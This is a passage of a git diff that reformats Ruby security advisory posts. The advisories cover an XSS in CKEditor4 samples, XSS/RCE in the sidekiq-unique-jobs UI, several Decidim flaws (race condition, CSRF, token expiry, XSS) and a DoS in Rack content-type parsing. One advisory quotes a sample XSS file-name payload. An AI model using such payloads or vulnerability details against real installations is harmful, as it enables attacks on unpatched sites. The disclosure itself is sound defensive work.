-    The CKEditor 4 team would like to thank [Marcin Wyczechowski](https://www.linkedin.com/in/marcin-wyczechowski-0a823795/) & [Michał Majchrowicz](https://www.linkedin.com/in/micha%C5%82-majchrowicz-mwsc/) [AFINE Team](https://afine.com/) for recognizing and reporting this vulnerability.
-  cvss_v3: 6.1
-  related:
-    url:
-    - https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-mw2c-vx6j-mg76
-    - https://github.com/ckeditor/ckeditor4/commit/8ed1a3c93d0ae5f49f4ecff5738ab8a2972194cb
-    - https://ckeditor.com/cke4/addon/preview
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-24816
-    - https://github.com/advisories/GHSA-mw2c-vx6j-mg76
----
+---
+layout: advisory
+title: 'CVE-2024-24816 (ckeditor): CKEditor4 Cross-site Scripting vulnerability in
+  samples with enabled the preview feature'
+comments: false
+categories:
+- ckeditor
+advisory:
+  gem: ckeditor
+  cve: 2024-24816
+  ghsa: mw2c-vx6j-mg76
+  url: https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-mw2c-vx6j-mg76
+  title: CKEditor4 Cross-site Scripting vulnerability in samples with enabled the
+    preview feature
+  date: 2024-02-07
+  description: |-
+    ### Affected packages
+    The vulnerability has been discovered in the samples that use the [preview](https://ckeditor.com/cke4/addon/preview) feature:
+
+    * `samples/old/**/*.html`
+    * `plugins/[plugin name]/samples/**/*.html`
+
+    All integrators that use these samples in the production code can be affected.
+
+    ### Impact
+
+    A potential vulnerability has been discovered in one of CKEditor's 4 samples that are shipped with production code. The vulnerability allowed to execute JavaScript code by abusing the misconfigured [preview feature](https://ckeditor.com/cke4/addon/preview). It affects all users using the CKEditor 4 at version < 4.24.0-lts with affected samples used in a production environment.
+
+    ### Patches
+    The problem has been recognized and patched. The fix will be available in version 4.24.0-lts.
+
+    ### For more information
+    Email us at [security@cksource.com](mailto:security@cksource.com) if you have any questions or comments about this advisory.
+
+    ### Acknowledgements
+    The CKEditor 4 team would like to thank [Marcin Wyczechowski](https://www.linkedin.com/in/marcin-wyczechowski-0a823795/) & [Michał Majchrowicz](https://www.linkedin.com/in/micha%C5%82-majchrowicz-mwsc/) [AFINE Team](https://afine.com/) for recognizing and reporting this vulnerability.
+  cvss_v3: 6.1
+  related:
+    url:
+    - https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-mw2c-vx6j-mg76
+    - https://github.com/ckeditor/ckeditor4/commit/8ed1a3c93d0ae5f49f4ecff5738ab8a2972194cb
+    - https://ckeditor.com/cke4/addon/preview
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-24816
+    - https://github.com/advisories/GHSA-mw2c-vx6j-mg76
+---
diff --git a/advisories/_posts/2024-02-13-CVE-2024-25122.md b/advisories/_posts/2024-02-13-CVE-2024-25122.md
index cb0098c4..23d2a15c 100644
--- a/advisories/_posts/2024-02-13-CVE-2024-25122.md
+++ b/advisories/_posts/2024-02-13-CVE-2024-25122.md
@@ -1,54 +1,54 @@
----
-layout: advisory
-title: 'CVE-2024-25122 (sidekiq-unique-jobs): sidekiq-unique-jobs UI server vulnerable
-  to XSS & RCE in Redis'
-comments: false
-categories:
-- sidekiq-unique-jobs
-advisory:
-  gem: sidekiq-unique-jobs
-  cve: 2024-25122
-  ghsa: cmh9-rx85-xj38
-  url: https://github.com/mhenrixon/sidekiq-unique-jobs/security/advisories/GHSA-cmh9-rx85-xj38
-  title: sidekiq-unique-jobs UI server vulnerable to XSS & RCE in Redis
-  date: 2024-02-13
-  description: |
-    Cross site scripting (XSS) potentially exposing cookies / sessions / localStorage, fixed by sidekiq-unique-jobs v8.0.7.
-
-    ### Details
-
-    Specially crafted URL query parameters handled by any of the following endpoints of sidekiq-unique-jobs' "admin" web UI,
-    allow a super-user attacker, or an unwitting, but authorized, victim, who has received a disguised / crafted link,
-    to successfully execute malicious code, which could potentially steal cookies, session data,
-    or local storage data from the app the sidekiq-unique-jobs web UI is mounted in.
-
-    If your sidekiq-unique-jobs web UI is mounted at `/sidekiq`, the vulnerable paths and query parameters are:
-
-    * `/sidekiq/changelogs`
-      * `filter`
-      * `count`
-    * `/sidekiq/locks`
-      * `filter`
-      * `count`
-    * `/sidekiq/expiring_locks`
-      * `filter`
-
-    ### Impact
-
-    This is a vulnerability of critical severity, which impacts many thousands of sites, since sidekiq-unique-jobs is widely deployed across the industry, with multiple attack vectors.
-
-    ### Patches
-
-    The fix for the XSS vulnerability was released in sidekiq-unique-jobs v8.0.7.
-  cvss_v3: 7.1
-  patched_versions:
-  - "~> 7.1.33"
-  - ">= 8.0.7"
-  related:
-    url:
-    - https://github.com/mhenrixon/sidekiq-unique-jobs/security/advisories/GHSA-cmh9-rx85-xj38
-    - https://github.com/mhenrixon/sidekiq-unique-jobs/commit/cd09ba6108f98973b6649a6149790c3d4502b4cc
-    - https://github.com/mhenrixon/sidekiq-unique-jobs/commit/ec3afd920c1b55843c72f748a87baac7f8be82ed
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-25122
-    - https://github.com/advisories/GHSA-cmh9-rx85-xj38
----
+---
+layout: advisory
+title: 'CVE-2024-25122 (sidekiq-unique-jobs): sidekiq-unique-jobs UI server vulnerable
+  to XSS & RCE in Redis'
+comments: false
+categories:
+- sidekiq-unique-jobs
+advisory:
+  gem: sidekiq-unique-jobs
+  cve: 2024-25122
+  ghsa: cmh9-rx85-xj38
+  url: https://github.com/mhenrixon/sidekiq-unique-jobs/security/advisories/GHSA-cmh9-rx85-xj38
+  title: sidekiq-unique-jobs UI server vulnerable to XSS & RCE in Redis
+  date: 2024-02-13
+  description: |
+    Cross site scripting (XSS) potentially exposing cookies / sessions / localStorage, fixed by sidekiq-unique-jobs v8.0.7.
+
+    ### Details
+
+    Specially crafted URL query parameters handled by any of the following endpoints of sidekiq-unique-jobs' "admin" web UI,
+    allow a super-user attacker, or an unwitting, but authorized, victim, who has received a disguised / crafted link,
+    to successfully execute malicious code, which could potentially steal cookies, session data,
+    or local storage data from the app the sidekiq-unique-jobs web UI is mounted in.
+
+    If your sidekiq-unique-jobs web UI is mounted at `/sidekiq`, the vulnerable paths and query parameters are:
+
+    * `/sidekiq/changelogs`
+      * `filter`
+      * `count`
+    * `/sidekiq/locks`
+      * `filter`
+      * `count`
+    * `/sidekiq/expiring_locks`
+      * `filter`
+
+    ### Impact
+
+    This is a vulnerability of critical severity, which impacts many thousands of sites, since sidekiq-unique-jobs is widely deployed across the industry, with multiple attack vectors.
+
+    ### Patches
+
+    The fix for the XSS vulnerability was released in sidekiq-unique-jobs v8.0.7.
+  cvss_v3: 7.1
+  patched_versions:
+  - "~> 7.1.33"
+  - ">= 8.0.7"
+  related:
+    url:
+    - https://github.com/mhenrixon/sidekiq-unique-jobs/security/advisories/GHSA-cmh9-rx85-xj38
+    - https://github.com/mhenrixon/sidekiq-unique-jobs/commit/cd09ba6108f98973b6649a6149790c3d4502b4cc
+    - https://github.com/mhenrixon/sidekiq-unique-jobs/commit/ec3afd920c1b55843c72f748a87baac7f8be82ed
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-25122
+    - https://github.com/advisories/GHSA-cmh9-rx85-xj38
+---
diff --git a/advisories/_posts/2024-02-20-CVE-2023-47634.md b/advisories/_posts/2024-02-20-CVE-2023-47634.md
index b8d4bd51..9c9d1acb 100644
--- a/advisories/_posts/2024-02-20-CVE-2023-47634.md
+++ b/advisories/_posts/2024-02-20-CVE-2023-47634.md
@@ -1,38 +1,38 @@
----
-layout: advisory
-title: 'CVE-2023-47634 (decidim): Race condition in Endorsements'
-comments: false
-categories:
-- decidim
-advisory:
-  gem: decidim
-  cve: 2023-47634
-  ghsa: r275-j57c-7mf2
-  url: https://github.com/decidim/decidim/security/advisories/GHSA-r275-j57c-7mf2
-  title: Race condition in Endorsements
-  date: 2024-02-20
-  description: |
-    ### Impact
-
-    A race condition in the endorsement of resources (for instance,
-    a proposal) allows a user to make more than once endorsement.
-
-    To exploit this vulnerability, the request to set an
-    endorsement must be sent several times in parallel.
-
-    ### Workarounds
-
-    Disable the Endorsement feature in the components.
-  cvss_v3: 3.1
-  unaffected_versions:
-  - "< 0.10.0"
-  patched_versions:
-  - "~> 0.26.9"
-  - ">= 0.27.5"
-  related:
-    url:
-    - https://github.com/decidim/decidim/security/advisories/GHSA-r275-j57c-7mf2
-    - https://github.com/decidim/decidim/commit/5c5ee7a50d75c10643dd8c495e2517641e4d74db
-    - https://github.com/decidim/decidim/commit/7b840d2c37a562709f4481db644d8c43add28536
-    - https://github.com/advisories/GHSA-r275-j57c-7mf2
----
+---
+layout: advisory
+title: 'CVE-2023-47634 (decidim): Race condition in Endorsements'
+comments: false
+categories:
+- decidim
+advisory:
+  gem: decidim
+  cve: 2023-47634
+  ghsa: r275-j57c-7mf2
+  url: https://github.com/decidim/decidim/security/advisories/GHSA-r275-j57c-7mf2
+  title: Race condition in Endorsements
+  date: 2024-02-20
+  description: |
+    ### Impact
+
+    A race condition in the endorsement of resources (for instance,
+    a proposal) allows a user to make more than once endorsement.
+
+    To exploit this vulnerability, the request to set an
+    endorsement must be sent several times in parallel.
+
+    ### Workarounds
+
+    Disable the Endorsement feature in the components.
+  cvss_v3: 3.1
+  unaffected_versions:
+  - "< 0.10.0"
+  patched_versions:
+  - "~> 0.26.9"
+  - ">= 0.27.5"
+  related:
+    url:
+    - https://github.com/decidim/decidim/security/advisories/GHSA-r275-j57c-7mf2
+    - https://github.com/decidim/decidim/commit/5c5ee7a50d75c10643dd8c495e2517641e4d74db
+    - https://github.com/decidim/decidim/commit/7b840d2c37a562709f4481db644d8c43add28536
+    - https://github.com/advisories/GHSA-r275-j57c-7mf2
+---
diff --git a/advisories/_posts/2024-02-20-CVE-2023-47635.md b/advisories/_posts/2024-02-20-CVE-2023-47635.md
index 18c1c9bf..de47563a 100644
--- a/advisories/_posts/2024-02-20-CVE-2023-47635.md
+++ b/advisories/_posts/2024-02-20-CVE-2023-47635.md
@@ -1,50 +1,50 @@
----
-layout: advisory
-title: 'CVE-2023-47635 (decidim-templates): Possible CSRF attack at questionnaire
-  templates preview'
-comments: false
-categories:
-- decidim-templates
-advisory:
-  gem: decidim-templates
-  cve: 2023-47635
-  ghsa: f3qm-vfc3-jg6v
-  url: https://github.com/decidim/decidim/security/advisories/GHSA-f3qm-vfc3-jg6v
-  title: Possible CSRF attack at questionnaire templates preview
-  date: 2024-02-20
-  description: |
-    ### Impact
-    The CSRF authenticity token check is currently disabled for the questionnaire templates preview as per:
-    https://github.com/decidim/decidim/blob/3187bdfd40ea1c57c2c12512b09a7fec0b2bed08/decidim-templates/app/controllers/decidim/templates/admin/questionnaire_templates_controller.rb#L11
-
-    This was introduced by this commit in the PR that introduced this feature (#6247):
-    https://github.com/decidim/decidim/pull/6247/commits/5542227be66e3b6d7530f5b536069bce09376660
-
-    The issue does not imply a serious security thread as you need to have access also to the session cookie in order to see this resource. This URL does not allow modifying the resource but it may allow attackers to gain access to information which was not meant to be public.
-
-    ### Patches
-    #11743
-
-    ### Workarounds
-    Disable the templates functionality or remove all available templates.
-
-    ### References
-    #11743
-  cvss_v3: 4.5
-  unaffected_versions:
-  - "< 0.23.0"
-  patched_versions:
-  - ">= 0.27.5"
-  related:
-    url:
-    - https://github.com/decidim/decidim/security/advisories/GHSA-f3qm-vfc3-jg6v
-    - https://github.com/decidim/decidim/pull/11743
-    - https://nvd.nist.gov/vuln/detail/CVE-2023-47635
-    - https://github.com/decidim/decidim/pull/6247
-    - https://github.com/decidim/decidim/commit/5542227be66e3b6d7530f5b536069bce09376660
-    - https://github.com/decidim/decidim/commit/57a4b467787448307b5d9b01ce6e2c8502e121ac
-    - https://github.com/decidim/decidim/blob/3187bdfd40ea1c57c2c12512b09a7fec0b2bed08/decidim-templates/app/controllers/decidim/templates/admin/questionnaire_templates_controller.rb#L11
-    - https://github.com/decidim/decidim/releases/tag/v0.27.5
-    - https://github.com/decidim/decidim/releases/tag/v0.28.0
-    - https://github.com/advisories/GHSA-f3qm-vfc3-jg6v
----
+---
+layout: advisory
+title: 'CVE-2023-47635 (decidim-templates): Possible CSRF attack at questionnaire
+  templates preview'
+comments: false
+categories:
+- decidim-templates
+advisory:
+  gem: decidim-templates
+  cve: 2023-47635
+  ghsa: f3qm-vfc3-jg6v
+  url: https://github.com/decidim/decidim/security/advisories/GHSA-f3qm-vfc3-jg6v
+  title: Possible CSRF attack at questionnaire templates preview
+  date: 2024-02-20
+  description: |
+    ### Impact
+    The CSRF authenticity token check is currently disabled for the questionnaire templates preview as per:
+    https://github.com/decidim/decidim/blob/3187bdfd40ea1c57c2c12512b09a7fec0b2bed08/decidim-templates/app/controllers/decidim/templates/admin/questionnaire_templates_controller.rb#L11
+
+    This was introduced by this commit in the PR that introduced this feature (#6247):
+    https://github.com/decidim/decidim/pull/6247/commits/5542227be66e3b6d7530f5b536069bce09376660
+
+    The issue does not imply a serious security thread as you need to have access also to the session cookie in order to see this resource. This URL does not allow modifying the resource but it may allow attackers to gain access to information which was not meant to be public.
+
+    ### Patches
+    #11743
+
+    ### Workarounds
+    Disable the templates functionality or remove all available templates.
+
+    ### References
+    #11743
+  cvss_v3: 4.5
+  unaffected_versions:
+  - "< 0.23.0"
+  patched_versions:
+  - ">= 0.27.5"
+  related:
+    url:
+    - https://github.com/decidim/decidim/security/advisories/GHSA-f3qm-vfc3-jg6v
+    - https://github.com/decidim/decidim/pull/11743
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-47635
+    - https://github.com/decidim/decidim/pull/6247
+    - https://github.com/decidim/decidim/commit/5542227be66e3b6d7530f5b536069bce09376660
+    - https://github.com/decidim/decidim/commit/57a4b467787448307b5d9b01ce6e2c8502e121ac
+    - https://github.com/decidim/decidim/blob/3187bdfd40ea1c57c2c12512b09a7fec0b2bed08/decidim-templates/app/controllers/decidim/templates/admin/questionnaire_templates_controller.rb#L11
+    - https://github.com/decidim/decidim/releases/tag/v0.27.5
+    - https://github.com/decidim/decidim/releases/tag/v0.28.0
+    - https://github.com/advisories/GHSA-f3qm-vfc3-jg6v
+---
diff --git a/advisories/_posts/2024-02-20-CVE-2023-48220.md b/advisories/_posts/2024-02-20-CVE-2023-48220.md
index 9d17f1f8..c77e422d 100644
--- a/advisories/_posts/2024-02-20-CVE-2023-48220.md
+++ b/advisories/_posts/2024-02-20-CVE-2023-48220.md
@@ -1,80 +1,80 @@
----
-layout: advisory
-title: 'CVE-2023-48220 (devise_invitable): Possibility to circumvent the invitation
-  token expiry period'
-comments: false
-categories:
-- devise_invitable
-advisory:
-  gem: devise_invitable
-  cve: 2023-48220
-  ghsa: w3q8-m492-4pwp
-  url: https://github.com/decidim/decidim/security/advisories/GHSA-w3q8-m492-4pwp
-  title: Possibility to circumvent the invitation token expiry period
-  date: 2024-02-20
-  description: |
-    ### Impact
-    The invites feature allows users to accept the invitation for an unlimited amount of time through the password reset functionality.
-
-    When using the password reset functionality, the `devise_invitable` gem always accepts the pending invitation if the user has been invited as shown in this piece of code within the `devise_invitable` gem:
-    https://github.com/scambra/devise_invitable/blob/41f58970ff76fb64382a9b9ea1bd530f7c3adab2/lib/devise_invitable/models.rb#L198
-
-    The only check done here is if the user has been invited but the code does not ensure that the pending invitation is still valid as defined by the `invite_for` expiry period as explained in the gem's documentation:
-    https://github.com/scambra/devise_invitable#model-configuration-
-
-    > `invite_for`: The period the generated invitation token is valid. After this period, the invited resource won’t be able to accept the invitation. When `invite_for` is `0` (the default), the invitation won’t expire.
-
-    Decidim sets this configuration to `2.weeks` so this configuration should be respected:
-    https://github.com/decidim/decidim/blob/d2d390578050772d1bdb6d731395f1afc39dcbfc/decidim-core/config/initializers/devise.rb#L134
-
-    The bug is in the `devise_invitable` gem and should be fixed there and the dependency should be upgraded in Decidim once the fix becomes available.
-
-    ### Patches
-    Update `devise_invitable` to version `2.0.9` or above by running the following command:
-
-    ```
-    $ bundle update devise_invitable
-    ```
-
-    ### Workarounds
-    The invitations can be cancelled directly from the database by running the following command from the Rails console:
-
-    ```
-    > Decidim::User.invitation_not_accepted.update_all(invitation_token: nil)
-    ```
-
-    ### References
-    OWASP ASVS V4.0.3-2.3.1
-
-    This bug has existed in the `devise_invitable` gem since this commit which was first included in the `v0.4.rc3` release of this gem:
-    https://github.com/scambra/devise_invitable/commit/94d859c7de0829bf63f679ae5dd3cab2b866a098
-
-    All versions since then are affected.
-
-    This gem was first introduced at its version `~> 1.7.0` to the `decidim-admin` gem in this commit which was first included in the `v0.0.1.alpha3` release of Decidim:
-    https://github.com/decidim/decidim/commit/073e60e2e4224dd81815a784002ebba30f2ebb34
-
-    It was first introduced at its version `~> 1.7.0` to the `decidim-system` gem in this commit which was also first included in the `v0.0.1.alpha3` release of Decidim:
-    https://github.com/decidim/decidim/commit/b12800717a689c295a9ea680a38ca9f823d2c454
-
-    ### Credits
-    This issue was discovered in City of Helsinki's security audit against Decidim 0.27 done during September 2023. The security audit was implemented by [Deloitte Finland](https://www2.deloitte.com/fi/fi.html).
-  cvss_v3: 5.7
-  unaffected_versions:
-  - "< 0.4.rc3"
-  patched_versions:
-  - ">= 2.0.9"
-  related:
-    url:
-    - https://github.com/decidim/decidim/security/advisories/GHSA-w3q8-m492-4pwp
-    - https://nvd.nist.gov/vuln/detail/CVE-2023-48220
-    - https://github.com/decidim/decidim/commit/073e60e2e4224dd81815a784002ebba30f2ebb34
-    - https://github.com/decidim/decidim/commit/b12800717a689c295a9ea680a38ca9f823d2c454
-    - https://github.com/scambra/devise_invitable/commit/94d859c7de0829bf63f679ae5dd3cab2b866a098
-    - https://github.com/decidim/decidim/blob/d2d390578050772d1bdb6d731395f1afc39dcbfc/decidim-core/config/initializers/devise.rb#L134
-    - https://github.com/decidim/decidim/releases/tag/v0.26.9
-    - https://github.com/decidim/decidim/releases/tag/v0.27.5
-    - https://github.com/decidim/decidim/releases/tag/v0.28.0
-    - https://github.com/scambra/devise_invitable/blob/41f58970ff76fb64382a9b9ea1bd530f7c3adab2/lib/devise_invitable/models.rb#L198
-    - https://github.com/advisories/GHSA-w3q8-m492-4pwp
----
+---
+layout: advisory
+title: 'CVE-2023-48220 (devise_invitable): Possibility to circumvent the invitation
+  token expiry period'
+comments: false
+categories:
+- devise_invitable
+advisory:
+  gem: devise_invitable
+  cve: 2023-48220
+  ghsa: w3q8-m492-4pwp
+  url: https://github.com/decidim/decidim/security/advisories/GHSA-w3q8-m492-4pwp
+  title: Possibility to circumvent the invitation token expiry period
+  date: 2024-02-20
+  description: |
+    ### Impact
+    The invites feature allows users to accept the invitation for an unlimited amount of time through the password reset functionality.
+
+    When using the password reset functionality, the `devise_invitable` gem always accepts the pending invitation if the user has been invited as shown in this piece of code within the `devise_invitable` gem:
+    https://github.com/scambra/devise_invitable/blob/41f58970ff76fb64382a9b9ea1bd530f7c3adab2/lib/devise_invitable/models.rb#L198
+
+    The only check done here is if the user has been invited but the code does not ensure that the pending invitation is still valid as defined by the `invite_for` expiry period as explained in the gem's documentation:
+    https://github.com/scambra/devise_invitable#model-configuration-
+
+    > `invite_for`: The period the generated invitation token is valid. After this period, the invited resource won’t be able to accept the invitation. When `invite_for` is `0` (the default), the invitation won’t expire.
+
+    Decidim sets this configuration to `2.weeks` so this configuration should be respected:
+    https://github.com/decidim/decidim/blob/d2d390578050772d1bdb6d731395f1afc39dcbfc/decidim-core/config/initializers/devise.rb#L134
+
+    The bug is in the `devise_invitable` gem and should be fixed there and the dependency should be upgraded in Decidim once the fix becomes available.
+
+    ### Patches
+    Update `devise_invitable` to version `2.0.9` or above by running the following command:
+
+    ```
+    $ bundle update devise_invitable
+    ```
+
+    ### Workarounds
+    The invitations can be cancelled directly from the database by running the following command from the Rails console:
+
+    ```
+    > Decidim::User.invitation_not_accepted.update_all(invitation_token: nil)
+    ```
+
+    ### References
+    OWASP ASVS V4.0.3-2.3.1
+
+    This bug has existed in the `devise_invitable` gem since this commit which was first included in the `v0.4.rc3` release of this gem:
+    https://github.com/scambra/devise_invitable/commit/94d859c7de0829bf63f679ae5dd3cab2b866a098
+
+    All versions since then are affected.
+
+    This gem was first introduced at its version `~> 1.7.0` to the `decidim-admin` gem in this commit which was first included in the `v0.0.1.alpha3` release of Decidim:
+    https://github.com/decidim/decidim/commit/073e60e2e4224dd81815a784002ebba30f2ebb34
+
+    It was first introduced at its version `~> 1.7.0` to the `decidim-system` gem in this commit which was also first included in the `v0.0.1.alpha3` release of Decidim:
+    https://github.com/decidim/decidim/commit/b12800717a689c295a9ea680a38ca9f823d2c454
+
+    ### Credits
+    This issue was discovered in City of Helsinki's security audit against Decidim 0.27 done during September 2023. The security audit was implemented by [Deloitte Finland](https://www2.deloitte.com/fi/fi.html).
+  cvss_v3: 5.7
+  unaffected_versions:
+  - "< 0.4.rc3"
+  patched_versions:
+  - ">= 2.0.9"
+  related:
+    url:
+    - https://github.com/decidim/decidim/security/advisories/GHSA-w3q8-m492-4pwp
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-48220
+    - https://github.com/decidim/decidim/commit/073e60e2e4224dd81815a784002ebba30f2ebb34
+    - https://github.com/decidim/decidim/commit/b12800717a689c295a9ea680a38ca9f823d2c454
+    - https://github.com/scambra/devise_invitable/commit/94d859c7de0829bf63f679ae5dd3cab2b866a098
+    - https://github.com/decidim/decidim/blob/d2d390578050772d1bdb6d731395f1afc39dcbfc/decidim-core/config/initializers/devise.rb#L134
+    - https://github.com/decidim/decidim/releases/tag/v0.26.9
+    - https://github.com/decidim/decidim/releases/tag/v0.27.5
+    - https://github.com/decidim/decidim/releases/tag/v0.28.0
+    - https://github.com/scambra/devise_invitable/blob/41f58970ff76fb64382a9b9ea1bd530f7c3adab2/lib/devise_invitable/models.rb#L198
+    - https://github.com/advisories/GHSA-w3q8-m492-4pwp
+---
diff --git a/advisories/_posts/2024-02-20-CVE-2023-51447.md b/advisories/_posts/2024-02-20-CVE-2023-51447.md
index bee7b67c..36e3b444 100644
--- a/advisories/_posts/2024-02-20-CVE-2023-51447.md
+++ b/advisories/_posts/2024-02-20-CVE-2023-51447.md
@@ -1,55 +1,55 @@
----
-layout: advisory
-title: 'CVE-2023-51447 (decidim): Cross-site scripting (XSS) in the dynamic file uploads'
-comments: false
-categories:
-- decidim
-advisory:
-  gem: decidim
-  cve: 2023-51447
-  ghsa: 9w99-78rj-hmxq
-  url: https://github.com/decidim/decidim/security/advisories/GHSA-9w99-78rj-hmxq
-  title: Cross-site scripting (XSS) in the dynamic file uploads
-  date: 2024-02-20
-  description: |
-    ### Impact
-    The dynamic file upload feature is subject to potential XSS attach in case the attacker manages to modify the file names of the records being uploaded to the server.
-
-    This appears in sections where the user controls the file upload dialogs themselves and has the technical knowledge to change the file names through the dynamic upload endpoint. Therefore I believe it would require the attacker to control the whole session of the particular user but in any case, this needs to be fixed.
-
-    Successful exploit of this vulneratibility would require the user to have successfully uploaded a file blob to the server with a malicious file name and then have the possibility to direct the other user to the edit page of the record where the attachment is attached.
-
-    The users are able to craft the direct upload requests themselves controlling the file name that gets stored to the database as shown here:
-    https://github.com/rails/rails/blob/a967d355c6fee9ad9b8bd115d43bc8b0fc207e7e/activestorage/app/controllers/active_storage/direct_uploads_controller.rb#L14
-
-    The attacker is able to change the filename e.g. to `<svg onload=alert('XSS')>` if they know how to craft these requests themselves. And then enter the returned blob ID to the form inputs manually by modifying the edit page source.
-
-    Therefore, anywhere we display these strings, we should properly escape them.
-
-    ### Patches
-    PR #11612 fixes this problem both for 0.28.dev and 0.27.x.
-
-    ### Workarounds
-    Disable dynamic uploads for the instance, e.g. from proposals.
-
-    ### References
-    OWASP ASVS v4.0.3-5.1.3
-
-    ### Credits
-    This issue was discovered in City of Helsinki's security audit against Decidim 0.27 done during September 2023. The security audit was implemented by [Deloitte Finland](https://www2.deloitte.com/fi/fi.html).
-  cvss_v3: 6.3
-  unaffected_versions:
-  - "< 0.27.0"
-  patched_versions:
-  - ">= 0.27.5"
-  related:
-    url:
-    - https://github.com/decidim/decidim/security/advisories/GHSA-9w99-78rj-hmxq
-    - https://nvd.nist.gov/vuln/detail/CVE-2023-51447
-    - https://github.com/decidim/decidim/pull/11612
-    - https://github.com/decidim/decidim/commit/aaf72787cf18beeeb6a771c1f7cbb7654b073423
-    - https://github.com/decidim/decidim/releases/tag/v0.27.5
-    - https://github.com/decidim/decidim/releases/tag/v0.28.0
-    - https://github.com/rails/rails/blob/a967d355c6fee9ad9b8bd115d43bc8b0fc207e7e/activestorage/app/controllers/active_storage/direct_uploads_controller.rb#L14
-    - https://github.com/advisories/GHSA-9w99-78rj-hmxq
----
+---
+layout: advisory
+title: 'CVE-2023-51447 (decidim): Cross-site scripting (XSS) in the dynamic file uploads'
+comments: false
+categories:
+- decidim
+advisory:
+  gem: decidim
+  cve: 2023-51447
+  ghsa: 9w99-78rj-hmxq
+  url: https://github.com/decidim/decidim/security/advisories/GHSA-9w99-78rj-hmxq
+  title: Cross-site scripting (XSS) in the dynamic file uploads
+  date: 2024-02-20
+  description: |
+    ### Impact
+    The dynamic file upload feature is subject to potential XSS attach in case the attacker manages to modify the file names of the records being uploaded to the server.
+
+    This appears in sections where the user controls the file upload dialogs themselves and has the technical knowledge to change the file names through the dynamic upload endpoint. Therefore I believe it would require the attacker to control the whole session of the particular user but in any case, this needs to be fixed.
+
+    Successful exploit of this vulneratibility would require the user to have successfully uploaded a file blob to the server with a malicious file name and then have the possibility to direct the other user to the edit page of the record where the attachment is attached.
+
+    The users are able to craft the direct upload requests themselves controlling the file name that gets stored to the database as shown here:
+    https://github.com/rails/rails/blob/a967d355c6fee9ad9b8bd115d43bc8b0fc207e7e/activestorage/app/controllers/active_storage/direct_uploads_controller.rb#L14
+
+    The attacker is able to change the filename e.g. to `<svg onload=alert('XSS')>` if they know how to craft these requests themselves. And then enter the returned blob ID to the form inputs manually by modifying the edit page source.
+
+    Therefore, anywhere we display these strings, we should properly escape them.
+
+    ### Patches
+    PR #11612 fixes this problem both for 0.28.dev and 0.27.x.
+
+    ### Workarounds
+    Disable dynamic uploads for the instance, e.g. from proposals.
+
+    ### References
+    OWASP ASVS v4.0.3-5.1.3
+
+    ### Credits
+    This issue was discovered in City of Helsinki's security audit against Decidim 0.27 done during September 2023. The security audit was implemented by [Deloitte Finland](https://www2.deloitte.com/fi/fi.html).
+  cvss_v3: 6.3
+  unaffected_versions:
+  - "< 0.27.0"
+  patched_versions:
+  - ">= 0.27.5"
+  related:
+    url:
+    - https://github.com/decidim/decidim/security/advisories/GHSA-9w99-78rj-hmxq
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-51447
+    - https://github.com/decidim/decidim/pull/11612
+    - https://github.com/decidim/decidim/commit/aaf72787cf18beeeb6a771c1f7cbb7654b073423
+    - https://github.com/decidim/decidim/releases/tag/v0.27.5
+    - https://github.com/decidim/decidim/releases/tag/v0.28.0
+    - https://github.com/rails/rails/blob/a967d355c6fee9ad9b8bd115d43bc8b0fc207e7e/activestorage/app/controllers/active_storage/direct_uploads_controller.rb#L14
+    - https://github.com/advisories/GHSA-9w99-78rj-hmxq
+---
diff --git a/advisories/_posts/2024-02-21-CVE-2024-25126.md b/advisories/_posts/2024-02-21-CVE-2024-25126.md
index de200673..5288ecac 100644
--- a/advisories/_posts/2024-02-21-CVE-2024-25126.md
+++ b/advisories/_posts/2024-02-21-CVE-2024-25126.md
@@ -1,67 +1,67 @@
----
-layout: advisory
-title: 'CVE-2024-25126 (rack): Denial of Service Vulnerability in Rack Content-Type
-  Parsing'
-comments: false
-categories:
-- rack
-advisory:
-  gem: rack
-  cve: 2024-25126
-  ghsa: 22f2-v57c-j9cx
-  url: https://discuss.rubyonrails.org/t/denial-of-service-vulnerability-in-rack-content-type-parsing/84941
-  title: Denial of Service Vulnerability in Rack Content-Type Parsing
-  date: 2024-02-21
-  description: |
-    There is a possible denial of service vulnerability in the content type
-    parsing component of Rack. This vulnerability has been assigned the CVE
-    identifier CVE-2024-25126.
-
-    Versions Affected: >= 0.4 Not affected: < 0.4 Fixed Versions: 3.0.9.1, 2.2.8.1
-
-    # Impact
-
-    Carefully crafted content type headers can cause Rack’s media type parser to
-    take much longer than expected, leading to a possible denial of service
-    vulnerability.
-
-    Impacted code will use Rack’s media type parser to parse content type headers.
-    This code will look like below:
-
-    ```
-    request.media_type
-
-    ## OR
-    request.media_type_params
-
-    ## OR
-    Rack::MediaType.type(content_type)
-    ```
-
-    Some frameworks (including Rails) call this code internally, so upgrading is
-    recommended!
-
-    All users running an affected release should either upgrade or use one of the
-    workarounds immediately.
-
-    # Releases
-
-    The fixed releases are available at the normal locations.
-
-    # Workarounds
-
-    There are no feasible workarounds for this issue.
-  cvss_v3: 5.3
-  unaffected_versions:
-  - "< 0.4"
-  patched_versions:
-  - "~> 2.2.8, >= 2.2.8.1"
-  - ">= 3.0.9.1"
-  related:
-    url:
-    - https://github.com/rack/rack/releases/tag/v3.0.9.1
-    - https://github.com/rack/rack/releases/tag/v2.2.8.1
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-25126
-    - https://access.redhat.com/security/cve/cve-2024-25126
-    - https://ubuntu.com/security/CVE-2024-25126
----
+---
+layout: advisory
+title: 'CVE-2024-25126 (rack): Denial of Service Vulnerability in Rack Content-Type
+  Parsing'
+comments: false
+categories:
+- rack
+advisory:
+  gem: rack
+  cve: 2024-25126
+  ghsa: 22f2-v57c-j9cx
+  url: https://discuss.rubyonrails.org/t/denial-of-service-vulnerability-in-rack-content-type-parsing/84941
+  title: Denial of Service Vulnerability in Rack Content-Type Parsing
+  date: 2024-02-21
+  description: |
+    There is a possible denial of service vulnerability in the content type
+    parsing component of Rack. This vulnerability has been assigned the CVE
+    identifier CVE-2024-25126.
+
